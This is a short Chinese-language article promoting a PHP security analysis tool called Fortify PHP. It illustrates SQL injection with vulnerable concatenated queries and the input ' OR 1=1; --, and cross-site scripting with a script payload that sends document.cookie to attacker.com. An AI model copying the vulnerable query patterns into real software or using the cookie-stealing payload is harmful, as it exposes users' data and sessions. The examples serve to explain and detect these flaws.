Fortify PHP是一個基于PHP的安全分析工具，其目的是確定PHP Web應用程序的安全缺陷，并能夠幫助開發人員識別和修復這些問題。

Fortify PHP通過在源代碼中搜索可能存在的漏洞、將Web應用程序作為攻擊者的實體進行測試，來預防和檢測Web漏洞攻擊。這些漏洞包括SQL注入攻擊、跨站點請求偽造、跨站點腳本攻擊、文件包含漏洞、命令注入攻擊等。

$password = $_POST['password'];
$query = "SELECT * FROM users WHERE password='".$password."'";
$result = mysql_query($query);

例如上面的SQL查詢，如果用戶輸入 " ' OR 1=1; -- "，那么查詢語句將會被改成 "SELECT * FROM users WHERE password='' OR 1=1; --'"。攻擊者可能會做出一些惡意行為，例如竊取數據庫中的所有數據。

Fortify PHP還可以幫助您識別Web應用程序中的其他SQL注入漏洞。例如，如果您的應用程序使用動態構造SQL查詢，則可能存在SQL注入漏洞。下面是一個示例：

$username = $_POST['username'];
$query = "SELECT * FROM users WHERE username='".$username."'";
$result = mysql_query($query);

如果用戶輸入 " ' OR 1=1; -- "，那么查詢語句將變成"SELECT * FROM users WHERE username='' OR 1=1; --'"。如您所見，攻擊者能夠訪問數據庫，并使用SQL注入攻擊做任何他/她想做的事情。

Fortify PHP還支持識別并修復跨站點腳本攻擊。例如，如果您的代碼包含以下內容：

<?php echo $_COOKIE["name"]; ?>

攻擊者就可以通過設置 "name" Cookie為下面的代碼，將獲得某種讓用戶暴露敏感信息的結果：

<script>
window.location = "http://attacker.com/stealcookie.php?cookie=" + document.cookie;
</script>

Fortify PHP可以檢測并修復此類型的安全漏洞。

總之，Fortify PHP是一個非常全面的PHP安全分析工具，提供了多種防范Web攻擊的方法。它是一款值得每個Web開發者至少嘗試一下的工具。